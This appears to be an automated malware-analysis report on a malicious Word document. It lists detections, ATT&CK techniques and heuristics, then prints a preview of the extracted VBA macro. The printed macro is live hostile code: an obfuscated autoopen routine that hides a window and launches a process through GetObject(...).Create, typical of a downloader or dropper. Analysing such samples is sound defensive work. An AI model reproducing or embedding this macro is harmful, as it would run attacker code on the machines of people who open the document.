MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine and the 'GetObject' call indicate that the macro is designed to execute code upon opening. The ClamAV detection 'Doc.Malware.Sagent-6913531-0' further confirms its malicious nature. The macro's obfuscated nature and the presence of legacy WordBasic markers suggest a downloader or dropper functionality, aiming to fetch and execute additional malicious content.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-6913531-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6913531-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15247 bytes |
SHA-256: 93a8c2059aec7a6cbae3b1e0c8ea5cf5cdd6feab79a5d130030daa918559929c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RGBAAAAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DAA1ok"
Attribute VB_Base = "0{11FA3F82-E4B5-405F-8EF2-A4EDC6C8FC4B}{81C5608A-D405-4E84-B25C-572AAB77D8F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "pQAQDo"
Attribute VB_Base = "0{1520CBA6-5B12-4DEF-90AA-4EC9A8D830B1}{58021442-A172-4850-9D48-B54A75136315}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "oCxCAA_"
Sub autoopen()
On Error Resume Next
Select Case f1UCAk
Case 30729869
zAXDAU = rGccUAZ1 / 511421431 / wBG4QQ - CInt(l1BU1UGA + CInt(599861014)) + (460800255 * CLng(569138753))
iBAAAA = 195896279 * ikAUDG
i1GZAQc = 279786515 - 694194166 + 602328881 - uBCwkD / NX_UBQ - Tan(624451200)
End Select
Select Case RXkoUAA
Case 402484054
fBB4AB = vQDAAGG / 83132355 / dAAZwB - CInt(ZAAAAB + CInt(628707835)) + (483055777 * CLng(182328249))
IAkDDAQc = 587794109 * K4B4BUD
AxDDAcB = 503059722 - 813161423 + 125186588 - H1A1ADc / rcXAUAwG - Tan(713845945)
End Select
Select Case oooXA4Z
Case 76390910
jXxA4A = TQAcAcUk / 469545881 / aBAA4AxQ - CInt(WQcBAQA1 + CInt(986411662)) + (857080194 * CLng(100735099))
r4AADoA = 216482113 * JAADUA
rC1CxBU = 868660489 - 193571284 + 137240318 - XQoDAXQ / u4_1BQG1 - Tan(416758353)
End Select
Set LUQcCA = GetObject(DAA1ok.i_AXBZ.Value + pQAQDo.i4QUAXAA + DAA1ok.i_AXBZ.Value)
Select Case LkAADAZ
Case 515707983
OA_x41c = ScDAk4 / 366699878 / wAZcwU - CInt(ZDUBcB1 + CInt(616176147)) + (605790561 * CLng(789832949))
CBQGAA4 = 149275485 * qcAwQAA
DAxAAAG = 371669840 - 148349073 + 786320384 - pUAAAUA / p44BQU - Tan(116146202)
End Select
Select Case CUB1ADx
Case 508389401
dQAQxAQ = FAQoXCDA / 502539082 / mkDGGA - CInt(LAAAxxAx + CInt(321087531)) + (145879321 * CLng(144222392))
BBA_ZZ = 374510205 * BZ_1AA_
kCA1QG = 88334532 - 511860673 + 853151872 - mXDADUQX / pxDBwA - Tan(604233999)
End Select
Select Case O1cDBx1
Case 328639229
uwX_kAG = CcA1AA / 750419241 / KAcAXxDA - CInt(SwB4A_ + CInt(934810938)) + (933717538 * CLng(956493763))
pUQAQ_Bc = 223803086 * PZkBZAxA
K4ABXD = 675409686 - 834898774 + 813919029 - AcUX_AGB / AAQADZ - Tan(916604516)
End Select
LUQcCA.ShowWindow = 135285 - 135285
Select Case iAA44BA
Case 41413412
C4A4AAA = YUx4oCU1 / 217733306 / dAGCAo - CInt(ZABwQC_Q + CInt(426115382)) + (543656623 * CLng(805127081))
wAUXBA = 925849930 * O4__BA
RAAkQD4X = 506457556 - 638540257 + 415989227 - mUZx4AcQ / tA1DAQ - Tan(65852886)
End Select
Select Case zCACDQXX
Case 875433556
oxAC_BQB = woUBkAo1 / 411022368 / DkcQBA - CInt(DAAZDC1B + CInt(788662900)) + (970260250 * CLng(242362408))
zAcDADA_ = 322187527 * hZUADXA
CCAQDA = 605945070 - 824520757 + 224725002 - IxUkDc / pwAAAc - Tan(849092343)
End Select
Select Case kC_BAUAX
Case 241966075
f41XQcZ = BAxAco / 397980961 / v14A4Z - CInt(wBDAxQXX + CInt(45678294)) + (445330008 * CLng(51758469))
rBA1oc = 944665992 * w1AAA_C
qAAxGQAx = 199459017 - 827069177 + 144851448 - SBBDUGZ / VBUAAAc - Tan(197569888)
End Select
GetObject(DAA1ok.i_AXBZ.Value + pQAQDo.lCADAcBU + DAA1ok.i_AXBZ.Value) _
.Create DAA1ok.i_AXBZ.Value + pQAQDo.IAAUCQ + DAA1ok.i_AXBZ.Value + pQAQDo.JAwUCkAA + DAA1ok.i_AXBZ.Value + DAA1ok.i_AXBZ.Value + pQAQDo.hABw_4 + DAA1ok.i_AXBZ.Value + DAA1ok.i_AXBZ.Value + pQAQDo.KA4kCZD + DAA1ok.i_AXBZ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.